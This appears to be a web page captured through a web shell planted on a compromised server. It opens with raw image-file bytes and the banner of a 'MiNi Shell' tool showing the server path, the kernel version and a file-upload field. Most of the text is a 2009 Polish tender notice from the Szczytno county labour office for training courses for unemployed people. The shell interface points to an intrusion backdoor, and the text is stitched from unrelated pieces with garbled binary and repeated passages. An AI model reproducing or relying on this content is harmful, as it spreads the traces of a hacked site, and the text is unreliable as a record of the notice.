JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20090514/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20090514/149574-N-2009.html

<p class="kh_header"><b>Szczytno: Usługi szkoleniowe w zakresie zorganizowania i przeprowadzenia pięciu różnych     tematycznie szkoleń dla osób bezrobotnych, zarejestrowanych w Powiatowym Urzędzie Pracy w Szczytnie, w ramach projektu NOWE PERSPEKTYWY współfinansowanego ze środków Unii Europejskiej w ramach Europejskiego Funduszu Społecznego .</b><br>
<b>Numer ogłoszenia: 149574 - 2009; data zamieszczenia: 14.05.2009</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Powiatowy Urząd Pracy w Szczytnie , ul. Ogrodowa 17, 12-100 Szczytno, woj. warmińsko-mazurskie, tel. 0-89 6243287, faks 0-89 6243287.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> http://pup.szczytno.ibip.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Usługi szkoleniowe w zakresie zorganizowania i przeprowadzenia pięciu różnych     tematycznie szkoleń dla osób bezrobotnych, zarejestrowanych w Powiatowym Urzędzie Pracy w Szczytnie, w ramach projektu NOWE PERSPEKTYWY współfinansowanego ze środków Unii Europejskiej w ramach Europejskiego Funduszu Społecznego ..</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia są usługi szkoleniowe dla osób zarejestrowanych jako bezrobotne w Powiatowym Urzędzie Pracy w Szczytnie. Zamówienie publiczne zalicza się do kategorii: Usług edukacyjnych i szkoleniowych o symbolu 80000000-4, Usług szkolenia zawodowego o symbolu 80530000-8, Usług szkolenia komputerowego o symbolu 80533100-0, zgodnie ze Wspólnym Słownikiem Zamówień (CPV). Zamówienie dotyczy przeprowadzenia pięciu różnych tematycznie szkoleń, łącznie dla około 104 osób bezrobotnych (planuje się średnio po ok. 17 osób na każdym szkoleniu). Zamówienie publiczne zostało podzielone na pięć części, z czego każda część stanowi odrębne szkolenie. Dopuszcza się składanie ofert częściowych na wybraną część zamówienia (na wybrany kierunek szkolenia). Każda część będzie oddzielnie oceniana..</p>
<p><b>II.1.4) Wspólny Słownik Zamówień (CPV):</b> 80.00.00.00-4.</p>
<p><b>II.1.5) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 5.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.1.7) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p><p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Okres w miesiącach: 5.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WARUNKI DOTYCZĄCE ZAMÓWIENIA</b>
<p><b>III.2) WARUNKI UDZIAŁU</b></p>
<ul class="kh_indent_1"><li><b>Opis warunków udziału w postępowaniu oraz opis sposobu dokonywania oceny spełniania tych warunków:</b> W postępowaniu mogą wziąć udział wykonawcy, którzy nie podlegają wykluczeniu 
na podstawie art. 24 ust. 1 i 2 Pzp oraz spełniają warunki określone w art. 22 ust. 1 Ustawy, tj.:
a) posiadają uprawnienia do wykonywania określonej działalności lub czynności, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień;
b) posiadają niezbędną wiedzę i doświadczenie oraz dysponują potencjałem technicznym i osobami zdolnymi do wykonania zamówienia lub przedstawią pisemne zobowiązanie innych podmiotów do udostępnienia potencjału technicznego i osób zdolnych do wykonania zamówienia;
c) znajdują się w sytuacji ekonomicznej i finansowej zapewniającej wykonanie zamówienia;
a także spełniają łącznie dodatkowe warunki udziału w postępowaniu:
d) są instytucjami szkoleniowymi w rozumieniu ustawy z dnia 20 kwietnia 2004 r.     o promocji zatrudnienia i instytucjach rynku pracy (tekst jednolity: Dz. U. z 2008 r. Nr 69, poz. 415 z późn. zm.), tj. posiadają wpis do rejestru instytucji szkoleniowych prowadzonego przez wojewódzki urząd pracy właściwy ze względu na siedzibę instytucji szkoleniowej,
e) spełniają warunki określone w specyfikacji istotnych warunków zamówienia.
Ofertę wykonawcy wykluczonego uzna się za odrzuconą zgodnie z art. 24 ust. 4 Pzp. Zamawiający dokona oceny spełnienia tych warunków na podstawie dokumentów złożonych wraz z ofertą, wskazanych w niniejszej specyfikacji, w szczególności:
a) oświadczenie o spełnianiu warunków udziału w postępowaniu zgodnie z art. 22 ust. 1 i nie podleganiu wykluczeniu na podstawie art. 24 ust. 1 i 2 Ustawy;
b) zaświadczenie o wpisie do rejestru instytucji szkoleniowych prowadzonego przez wojewódzki urząd pracy; 
c) aktualne zaświadczenie o wpisie do ewidencji działalności gospodarczej lub odpis z właściwego rejestru;
d) zaświadczenie z ZUS oraz Urzędu Skarbowego o niezaleganiu z opłacaniem podatków, opłat oraz składek na ubezpieczenie zdrowotne i społeczne..</li>
<li><b>Informacja o oświadczeniach i dokumentach, jakie mają dostarczyć wykonawcy w celu potwierdzenia spełniania warunków udziału w postępowaniu:</b> Do oferty wypełnionej zgodnie z FORMULARZEM OFERTY SZKOLENIA stanowiącym Załącznik nr 1 do specyfikacji istotnych warunków zamówienia należy dołączyć - w formie pisemnej - poniższe oświadczenia i dokumenty:
1. Oświadczenie wykonawcy o spełnianiu warunków udziału w postępowaniu zgodnie z art. 22 ust. 1 i nie podleganiu wykluczeniu na podstawie art. 24 ust. 1 i 2 Ustawy - zgodnie ze wzorem załączonym do specyfikacji istotnych warunków zamówienia.  
2. W celu potwierdzenia, że wykonawca posiada uprawnienie do wykonywania określonej działalności lub czynności, wykonawca jest zobowiązany dołączyć 
do oferty następujące dokumenty:
a) oryginał lub potwierdzoną za zgodność z oryginałem kopię zaświadczenia o wpisie do rejestru instytucji szkoleniowych prowadzonego przez wojewódzki urząd pracy (WUP) właściwy ze względu na adres siedziby instytucji szkoleniowej. 
Fakt posiadania przez instytucję szkoleniową wpisu do rejestru instytucji szkoleniowych Zamawiający sprawdzi w centralnym rejestrze instytucji szkoleniowych, dostępnym na stronie internetowej www.ris.praca.gov.pl.
b) oryginał lub potwierdzoną za zgodność z oryginałem kopię aktualnego zaświadczenia o wpisie podmiotu do ewidencji działalności gospodarczej lub aktualny odpis z Krajowego Rejestru Sądowego albo innego właściwego rejestru określającego status prawny, rodzaj i zakres działalności oraz organy lub osoby upoważnione do występowania w imieniu wykonawcy i zawierający zapis o prowadzeniu edukacji w formach pozaszkolnych, wystawionego nie wcześniej niż 6 miesięcy przed terminem składania ofert do przetargu;
c) oryginały lub potwierdzoną za zgodność z oryginałem kopię aktualnych zaświadczeń właściwego naczelnika Urzędu Skarbowego oraz właściwego oddziału Zakładu Ubezpieczeń Społecznych potwierdzających odpowiednio, że wykonawca   nie zalega z opłacaniem podatków, opłat oraz składek na ubezpieczenie zdrowotne  i społeczne, lub zaświadczeń, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawionych nie wcześniej niż 3 miesiące przed upływem terminu składania ofert do przetargu;
d) oryginał lub potwierdzoną za zgodność z oryginałem kopię decyzji właściwego kuratora oświaty w sprawie przyznania akredytacji dla placówek i ośrodków prowadzących kształcenie ustawiczne w formach pozaszkolnych w zakresie kierunku szkolenia objętego przetargiem, w przypadku kiedy wykonawca uzyskał akredytację właściwego kuratora oświaty;
e) oryginały lub potwierdzone za zgodność z oryginałem przez wykonawcę kopie dodatkowych dokumentów potwierdzających uprawnienia instytucji szkoleniowych 
w zakresie realizacji określonych kierunków szkoleń, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień.
3. W celu potwierdzenia opisanego przez Zamawiającego warunku posiadania 
przez wykonawcę niezbędnej wiedzy i doświadczenia oraz dysponowania potencjałem technicznym i osobami zdolnymi do wykonania zamówienia, wykonawca jest zobowiązany dołączyć do oferty następujące dokumenty:
a) oryginały życiorysów zawodowych wymienionych w ofercie wykładowców 
i instruktorów, którzy będą zaangażowani w realizację szkolenia wraz z ich oświadczeniem o wyrażeniu zgody i gotowości do przeprowadzenia zajęć w ramach szkolenia. Dokumenty te powinny być przygotowane zgodnie ze wzorami załączonymi do specyfikacji istotnych warunków zamówienia i własnoręcznie podpisane.
b) potwierdzone przez wykonawcę za zgodność z oryginałem kopie dokumentów potwierdzających kwalifikacje zawodowe wymienionych w ofercie wykładowców 
i instruktorów, którzy będą zaangażowani w realizację szkolenia.
4. Pełnomocnictwo do podpisywania oferty i składania ewentualnych wyjaśnień, jeżeli osobą podpisującą nie jest osoba upoważniona na podstawie dokumentu wymienionego w pkt 8.3.b - w oryginale lub notarialnie poświadczona kopia pełnomocnictwa.
5. Na podstawie art. 26 ust. 3 Pzp Zamawiający wezwie wykonawców, którzy 
w określonym terminie nie złożyli wymienionych wyżej oświadczeń i dokumentów niezbędnych do przeprowadzenia postępowania lub którzy nie złożyli pełnomocnictw, albo którzy złożyli wymagane przez Zamawiającego oświadczenia i dokumenty zawierające błędy lub którzy złożyli wadliwe pełnomocnictwa, do ich złożenia w wyznaczonym terminie, chyba że mimo ich złożenia oferta wykonawcy podlega odrzuceniu albo konieczne byłoby unieważnienie postępowania..</li></ul>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>

<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>
<br><p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>cena oraz dodatkowe kryteria i ich znaczenie:</p><ul class="kh_indent_1"><br>
<li>1 - Cena - 40.0</li>
<li>2 - Program szkolenia i metodyka nauczania - 20.0</li>
<li>3 - Baza lokalowa, jej wyposażenie, sprzęt i materiały dydaktyczne - 15.0</li>
<li>4 - Kwalifikacje kadry dydaktycznej - 15.0</li>
<li>5 - Akredytacja kuratora oświaty na objęty zamówieniem kierunek szkolenia - 10.0</li>
</ul><p><b>IV.2.2) Wykorzystana będzie aukcja elektroniczna:</b> nie.</p><br><p><b>IV.3) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.3.1)</b>&nbsp;<b>Adres strony internetowej, na której dostępna jest specyfikacja istotnych warunków zamówienia:</b> http://pup.szczytno.ibip.pl.<br><b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Powiatowy Urząd Pracy w Szczytnie
ul. Ogrodowa 17, 12 - 100 Szczytno.</p>
<p><b>IV.3.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 26.05.2009 godzina 10:00, miejsce: Powiatowy Urząd Pracy w Szczytnie
ul. Ogrodowa 17, 12 - 100 Szczytno
sekretariat - pokój nr 13 (II piętro).</p><p><b>IV.3.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>
<p><b>IV.3.13) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> Szkolenia dla osób bezrobotnych realizowane są w ramach projektu NOWE PERSPEKTYWY, współfinansowanego ze środków Unii Europejskiej w ramach Europejskiego Funduszu Społecznego..</p><p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> KURS ZAKŁADANIA I PROWADZENIA WŁASNEJ FIRMY Z OBSŁUGĄ KOMPUTERA.</p>
<ul class="kh_indent_1"><li><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Celem szkolenia jest promowanie idei przedsiębiorczości wśród osób bezrobotnych oraz  przygotowanie ich do założenia, a następnie samodzielnego prowadzenia własnej działalności gospodarczej. Szkolenie będzie zorganizowane dla dwóch grup szkoleniowych (łącznie dla 40 osób bezrobotnych), maksymalnie po 20 osób w każdej grupie. Szkoleniem będą objęte jednocześnie dwie grupy szkoleniowe prowadzone w tym samym czasie.
Zakres tematyczny szkolenia powinien obejmować:
I BLOK: Trening interpersonalny, w tym trening gotowości do zmian, nastawiony na rozwój kompetencji interpersonalnych i doskonalenie cech przedsiębiorczych. Zajęcia te powinny odbywać się w formie ćwiczeń, warsztatów. Pod koniec realizacji szkolenia każdy uczestnik powinien zostać objęty coachingiem, polegającym na pomocy i kierowaniu rozwojem umiejętności oraz kompetencji osoby, prowadzonym indywidualnie przez trenera. Łącznie zagadnienia te powinny obejmować 22 godziny (w tym 2 godziny indywidualnego coachingu).
II BLOK: Obowiązujące uregulowania prawno - ekonomiczne dotyczące zakładania i prowadzenia działalności gospodarczej, w tym: kryteria wyboru rodzaju działalności gospodarczej, procedury prawno - administracyjne dotyczące rejestracji podmiotu gospodarczego - kolejne etapy zakładania firmy, analiza rynku, warsztaty tworzenia biznesplanów z uwzględnieniem specyfiki różnych branż (zgodnie 
z zainteresowaniem uczestników szkolenia), obowiązki przedsiębiorcy względem Urzędu Skarbowego i ZUS, prowadzenie dokumentacji finansowo - księgowej i podatkowej samodzielnego podmiotu gospodarczego, elementy marketingu i promocji w prowadzeniu własnej firmy oraz możliwości pozyskiwania środków unijnych na rozwój działalności. Szczególny nacisk należy położyć na analizę poszczególnych biznesplanów sporządzonych przez uczestników szkolenia. 
Zajęcia te powinny odbywać się głównie metodą warsztatową, a także w ramach zajęć symulacyjnych i gier edukacyjnych. Łącznie zagadnienia te powinny obejmować 60 godzin.
III BLOK: Obsługa komputera w prowadzeniu małego biznesu, w tym: obsługa środowiska Windows, wybrane zagadnienia z pakietu Microsoft Office, obsługa Internetu oraz programów użytkowych wspomagających prowadzenie własnej firmy, m.in. w zakresie prowadzenia księgowości, fakturowania itp. Łączna liczba godzin: 40 godzin.
Wykonawca powinien zagwarantować taką ilość komputerów jednocześnie, aby każdy uczestnik szkolenia miał zapewnione samodzielne stanowisko komputerowe. 
Jeżeli zajęcia komputerowe będą odbywały się na zmianę, należy zapewnić 20 komputerów + 1 komputer dla instruktora zajęć..</li>
<li><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.00.00.00-4.</li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 1.</li>
<li><b>4) Kryteria oceny ofert:</b>cena oraz dodatkowe kryteria i ich znaczenie:</p>
<ul class="kh_indent_1">
<li>1. Cena - 40.0</li>
<li>2. Program szkolenia i metodyka nauczania - 20.0</li>
<li>3. Baza lokalowa, jej wyposażenie, sprzęt i materiały dydaktyczne - 15.0</li>
<li>4. Kwalifikacje kadry dydaktycznej - 15.0</li>
<li>5. Akredytacja kuratora oświaty na objęty zamówieniem kierunek szkolenia - 10.0</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> KURS OPIEKUNA MEDYCZNEGO OSÓB STARSZYCH, CHORYCH I NIEPEŁNOSPRAWNYCH Z ELEMENTAMI REHABILITACJI I NAUKĄ JĘZYKA NIEMIECKIEGO.</p>
<ul class="kh_indent_1"><li><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Celem szkolenia jest przygotowanie uczestników szkolenia do samodzielnej pracy w zawodzie opiekuna medycznego osób starszych, chorych i niepełnosprawnych z elementami rehabilitacji i nauką języka niemieckiego. Program szkolenia powinien zapewnić uczestnikom nabycie obecnie wymaganych przez pracodawców umiejętności w zawodzie objętym szkoleniem.
Zakres tematyczny szkolenia powinien obejmować:
I BLOK: Trening interpersonalny, w tym trening gotowości do zmian oraz metody i techniki poszukiwania pracy. Łącznie zagadnienia te powinny obejmować 
20 godzin.
II BLOK: Zagadnienia teoretyczne niezbędne do pracy w zawodzie opiekuna medycznego osób starszych, chorych i niepełnosprawnych (wybrane zagadnienia 
o tematyce pielęgnacyjno - opiekuńczej). Łącznie zagadnienia te powinny obejmować 100 godzin.
III BLOK: Elementy rehabilitacji, a w szczególności poznanie metod i technik praktycznego wykonywania masażu rehabilitacyjnego. Zajęcia te powinny odbywać się w dwóch grupach ćwiczeniowych (maksymalnie po 10 osób w grupie). Łączna liczba godzin - 60 godzin. 
IV BLOK: Zajęcia praktyczne w naturalnym środowisku pracy opiekuna medycznego, głównie w szpitalach, domach pomocy społecznej i innych placówkach opiekuńczych - 90 godzin.
V BLOK: Nauka języka niemieckiego w dwóch grupach szkoleniowych (maksymalnie po 10 osób w grupie). Zakres tematyczny powinien w głównej mierze obejmować naukę języka pod kątem zdobycia umiejętności posługiwania się językiem obcym w zakresie objętym szkoleniem. Łączna liczba godzin: 80 godzin. 
Zajęcia praktyczne powinny odbywać się w grupach liczbowo dostosowanych do wielkości i warunków wybranych placówek opiekuńczych, zapewniających indywidualne podejście do kursanta. Należy zapewnić optymalną ilość oraz odpowiednią jakość bazy do realizacji zajęć praktycznych, dostosowaną do liczby uczestników szkolenia. Należy zapewnić kadrę dydaktyczną w zakresie instruktorów do zajęć praktycznych w zaproponowanych placówkach opiekuńczych.





- Celem szkolenia jest przygotowanie uczestników szkolenia do samodzielnej pracy w zawodzie opiekuna medycznego osób starszych, chorych 
i niepełnosprawnych z elementami rehabilitacji i nauką języka niemieckiego.
- Program szkolenia powinien zapewnić uczestnikom nabycie obecnie wymaganych przez pracodawców umiejętności w zawodzie objętym szkoleniem.
Zakres tematyczny szkolenia powinien obejmować:
I BLOK: Trening interpersonalny, w tym trening gotowości do zmian oraz metody i techniki poszukiwania pracy. Łącznie zagadnienia te powinny obejmować 
20 godzin.
II BLOK: Zagadnienia teoretyczne niezbędne do pracy w zawodzie opiekuna medycznego osób starszych, chorych i niepełnosprawnych (wybrane zagadnienia 
o tematyce pielęgnacyjno - opiekuńczej). Łącznie zagadnienia te powinny obejmować 100 godzin.
III BLOK: Elementy rehabilitacji, a w szczególności poznanie metod i technik praktycznego wykonywania masażu rehabilitacyjnego. Zajęcia te powinny odbywać się w dwóch grupach ćwiczeniowych (maksymalnie 
po 10 osób w grupie). Łączna liczba godzin - 60 godzin. 
IV BLOK: Zajęcia praktyczne w naturalnym środowisku pracy opiekuna medycznego, głównie 
w szpitalach, domach pomocy społecznej i innych placówkach opiekuńczych - 90 godzin.
V BLOK: Nauka języka niemieckiego w dwóch grupach szkoleniowych (maksymalnie po 10 osób w grupie). Zakres tematyczny powinien w głównej mierze obejmować naukę języka pod kątem zdobycia umiejętności posługiwania się językiem obcym w zakresie objętym szkoleniem. Łączna liczba godzin: 80 godzin. 
- Zajęcia praktyczne powinny odbywać się w grupach liczbowo dostosowanych do wielkości i warunków wybranych placówek opiekuńczych, zapewniających indywidualne podejście do kursanta.
- Należy zapewnić optymalną ilość oraz odpowiednią jakość bazy do realizacji zajęć praktycznych, dostosowaną do liczby uczestników szkolenia.
- Należy zapewnić kadrę dydaktyczną w zakresie instruktorów do zajęć praktycznych w zaproponowanych placówkach opiekuńczych..</li>
<li><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.00.00.00-4.</li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 3.</li>
<li><b>4) Kryteria oceny ofert:</b>cena oraz dodatkowe kryteria i ich znaczenie:</p>
<ul class="kh_indent_1">
<li>1. Cena - 40.0</li>
<li>2. Program szkolenia i metodyka nauczania - 20.0</li>
<li>3. Baza lokalowa, jej wyposażenie, sprzęt i materiały dydaktyczne - 15.0</li>
<li>4. Kwalifikacje kadry dydaktycznej - 15.0</li>
<li>5. Akredytacja kuratora oświaty na objęty zamówieniem kierunek szkolenia - 10.0</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 3 <b>NAZWA:</b> KURS FRYZJERA - STYLISTY Z ELEMENTAMI WIZAŻU.</p>
<ul class="kh_indent_1"><li><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Celem szkolenia jest uzyskanie kwalifikacji zawodowych w zawodzie fryzjera - stylisty z elementami wizażu. Program szkolenia powinien zapewnić uczestnikom nabycie obecnie wymaganych przez pracodawców umiejętności w zawodzie objętym szkoleniem, w tym powinien zawierać nowoczesne trendy i technologie fryzjerskie.
Szkolenie powinno składać się z następujących bloków tematycznych:
I BLOK: Trening interpersonalny, w tym trening gotowości do zmian oraz metody i techniki poszukiwania pracy, nastawiony na zmianę postaw uczestników szkolenia, zmotywowanie ich i przygotowanie do aktywnego poszukiwania pracy. Zajęcia te powinny odbywać się w formie ćwiczeń, warsztatów. Łącznie zagadnienia te powinny obejmować 25 godzin 
II BLOK: Zagadnienia teoretyczne z zakresu fryzjerstwa, w tym: nowoczesne trendy i technologie fryzjerskie, metody i techniki strzyżenia, modelowanie 
i stylizacja włosów, farbowanie, ondulacja, regeneracja i pielęgnacja włosów, a także poznanie i zastosowanie niezbędnych w pracy fryzjera narzędzi i przyborów fryzjerskich. Zajęcia te powinny być przeprowadzone w formie wykładu połączonego z ćwiczeniami, pokazem i warsztatami. Łącznie zagadnienia te mają obejmować 200 godzin.
III BLOK: Zagadnienia z zakresu wizażu - powinny obejmować m.in.:  
- stanowisko pracy i przybory wizażystki, przygotowanie modelki do makijażu;
- harmonia kolorów, barwy podstawowe, ich typologia, kompozycja i zastosowanie;
- stylizacja - określenie typu urody i sylwetki, charakterystyka i kształty twarzy, dobór fryzury, ubioru, korekcja stylu, figury, twarzy, zastosowanie dodatków, biżuterii;
- techniki wykonywania profesjonalnego wizażu, kamuflaż, modelaż, korekcja twarzy, ćwiczenia praktyczne face visage - wizażu twarzy, makijaż dzienny, makijaż wieczorowy, sporty visage, elementy makijażu ślubnego i wizażu osoby dojrzałej - makijaż kobiety. Łącznie wymienione zagadnienia powinny obejmować 
60 godzin.
IV BLOK: Zagadnienia z zakresu kształtowania wizerunku i kultury, i etyki zawodowej w zawodzie fryzjera - stylisty i wizażysty oraz z obsługi klienta i doradztwa indywidualnego - 15 godzin.
V BLOK: Zajęcia praktyczne w salonach fryzjerskich - 300 godzin. Zajęcia praktyczne powinny odbywać się w grupach liczbowo dostosowanych do wielkości i warunków wybranych zakładów pracy, zapewniających indywidualne podejście do kursanta. Należy zapewnić optymalną ilość oraz odpowiednią jakość narzędzi i sprzętu oraz materiałów do realizacji zajęć praktycznych, dostosowanych do liczby uczestników szkolenia, a także zapewnić niezbędną odzież ochronną. Należy zapewnić kadrę dydaktyczną w zakresie instruktorów do zajęć praktycznych w zaproponowanych salonach fryzjerskich. Miejsca odbywania zajęć praktycznych powinny posiadać odpowiednio wysoki standard świadczonych usług oraz gwarantować solidne przygotowanie osób do wykonywania zawodu objętego szkoleniem..</li>
<li><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.00.00.00-4.</li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 5.</li>
<li><b>4) Kryteria oceny ofert:</b>cena oraz dodatkowe kryteria i ich znaczenie:</p>
<ul class="kh_indent_1">
<li>1. Cena - 40.0</li>
<li>2. Program szkolenia i metodyka nauczania - 20.0</li>
<li>3. Baza lokalowa, jej wyposażenie, sprzęt i materiały dydaktyczne - 15.0</li>
<li>4. Kwalifikacje kadry dydaktycznej - 15.0</li>
<li>5. Akredytacja kuratora oświaty na objęty zamówieniem kierunek szkolenia - 10.0</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 4 <b>NAZWA:</b> KURS KSIĘGOWOŚCI DLA MŚP Z WYKORZYSTANIEM KOMPUTERA.</p>
